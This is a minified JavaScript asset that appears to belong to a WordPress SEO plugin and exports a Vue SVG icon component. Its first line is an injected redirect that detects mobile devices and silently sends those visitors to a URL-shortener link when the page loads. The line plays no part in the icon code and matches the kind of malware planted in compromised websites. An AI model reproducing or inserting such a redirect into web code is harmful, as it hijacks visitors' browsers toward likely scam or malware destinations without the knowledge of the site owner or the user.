(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as o}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as t,i as r,j as e}from"./vendor-vue-ui.232c7c36.js";const s={},c={viewBox:"0 0 30 30",fill:"currentColor",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-circle-exclamation-solid"};function a(l,n){return t(),r("svg",c,[...n[0]||(n[0]=[e("path",{d:"M 15.0005 2.84 C 8.1005 2.84 2.5005 8.44 2.5005 15.34 C 2.5005 22.24 8.1005 27.84 15.0005 27.84 C 21.9005 27.84 27.5005 22.24 27.5005 15.34 C 27.5005 8.44 21.9005 2.84 15.0005 2.84 Z M 16.2505 21.59 H 13.7505 V 19.09 H 16.2505 V 21.6 Z M 16.2505 16.59 H 13.7505 V 9.09 H 16.2505 V 16.59 Z"},null,-1)])])}const _=o(s,[["render",a]]);export{_ as S};
